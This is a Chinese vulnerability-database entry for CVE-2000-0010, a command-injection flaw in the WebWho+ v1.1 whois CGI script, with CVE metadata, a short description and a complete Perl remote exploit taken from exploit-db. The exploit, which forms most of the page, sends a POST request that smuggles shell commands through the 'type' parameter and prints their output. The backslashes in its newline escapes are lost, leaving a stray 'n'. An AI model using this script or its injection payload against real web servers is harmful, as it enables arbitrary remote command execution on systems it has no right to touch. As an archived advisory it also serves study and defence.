WebWho + whois.cgi程序执行命令漏洞

WebWho + whois.cgi程序执行命令漏洞

漏洞ID 1105660 漏洞类型 未知
发布时间 1999-12-26 更新时间 2005-05-02
图片[1]-WebWho + whois.cgi程序执行命令漏洞-安全小百科CVE编号 CVE-2000-0010
图片[2]-WebWho + whois.cgi程序执行命令漏洞-安全小百科CNNVD-ID CNNVD-199912-087
漏洞平台 Multiple CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/19691
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199912-087
|漏洞详情
WebWho+whois.cgi程序中存在漏洞,远程攻击者利用该漏洞通过TLD参数的shell元字符执行命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/892/info

WebWho+ is a free cgi script written by Tony Greenwood for executing whois queries via the www. Though it does perform checks for shell escape characters on some parameters, it misses the 'type' variable and allows for malicious input to be sent to a shell. It is possible to execute arbitrary commands on a webserver running WebWho+ v1.1 with the uid of the webserver (usually nobody). 

#!/usr/bin/perl
#
# hhp-webwho.pl
# WebWho+ v1.1 (whois cgi) remote exploit.
#
# By: loophole of hhp.
# [12/26/99]
#
# http://hhp.perlx.com/
# [email protected]
#
# Advisrory: http://hhp.perlx.com/ouradvisories/hhp-webwho.txt

use IO::Socket;

if (@ARGV < 2)
 {
  print "* hhp-webwho.pln";
  print "* webwho.pl (whois cgi) remote exploit.n";
  print "* By: loophole of hhp.n";
  print "* [email protected]";
  print "* http://hhp.perlx.com/nn";
  print "USAGE: $0 <Server> [-e <File Extention>] <Command>nn";
  print "* Server         = www.example.comn";
  print "* File Extension = /cgi-bin/webwho.pln";
  print "* Command        = Shell commandnn";
  print "* NOTE: Defualt <File Extension> is /cgi-bin/webwho.pln";
  print "*       It only needs changing if it is not the defualt.nn";
  print "* EXAMPLE: $0 www.gat.org idn";
  print "*      OR: $0 www.gat.org -e /jack/webwho.pl idn";
  exit 0;
 }

if ($ARGV[1] eq "-e")
 {
  if (@ARGV != 4)
   {
    print "Invalid Usage!n";
    exit 0;
   }
  $server     = $ARGV[0];
  $saywhatnig = $ARGV[2];
  $command    = $ARGV[3];
 }
  else
   {
    if (@ARGV == 2)
     {
      $server     = $ARGV[0];
      $command    = $ARGV[1];
      $saywhatnig = "/cgi-bin/webwho.pl";
     }
   }

$sock = IO::Socket::INET->new(PeerAddr => $server,
                              PeerPort => 80,
                                 Proto => "tcp") or die "Wack connection.n";

$calkuhlashun = 45 + length($command);

  print $sock "POST $saywhatnig HTTP/1.1n";
  print $sock "Accept-Language: en-usn";
  print $sock "Host: $servern";
  print $sock "Content-Length: $calkuhlashunn";
  print $sock "Connection: Keep-Alivenn";
  print $sock 'command=X&type=";echo fukk;';
  print $sock "$command";
  print $sock ";echo fokk&Check=Xn";
  $doot = 0;

  while(<$sock>)
   {
    s/n//g;
    s/fukk<br>/--------Exploit Stats------------/;
    s/fokk<br>/-hhpfoelife-n/;
    s/<br>//g;
    $foo = $_;

     if ($foo =~ /---Ex/)
      {
       $doot = 1;
      }

     if ($foo =~ /-hhpfoelife-/)
      {
       $doot = 0;
       print "---------------------------------n";
       exit 0;
      }

     if ($doot == 1) 
      {
       print "$foon";
      }  
   }
exit 0;
|参考资料
VulnerablesoftwareandversionsConfiguration1OR*cpe:/a:tony_greenwood:webwho%2B:1.1*DenotesVulnerableSoftware*ChangesrelatedtovulnerabilityconfigurationsTechnicalDetailsVulnerabilityType(ViewAll)CVEStandardVulnerabilityEntry:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0010

相关推荐: ITA Forum 1.49 – SQL Injection

ITA Forum 1.49 – SQL Injection 漏洞ID 1054857 漏洞类型 发布时间 2005-01-13 更新时间 2005-01-13 CVE编号 N/A CNNVD-ID N/A 漏洞平台 PHP CVSS评分 N/A |漏洞来源 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享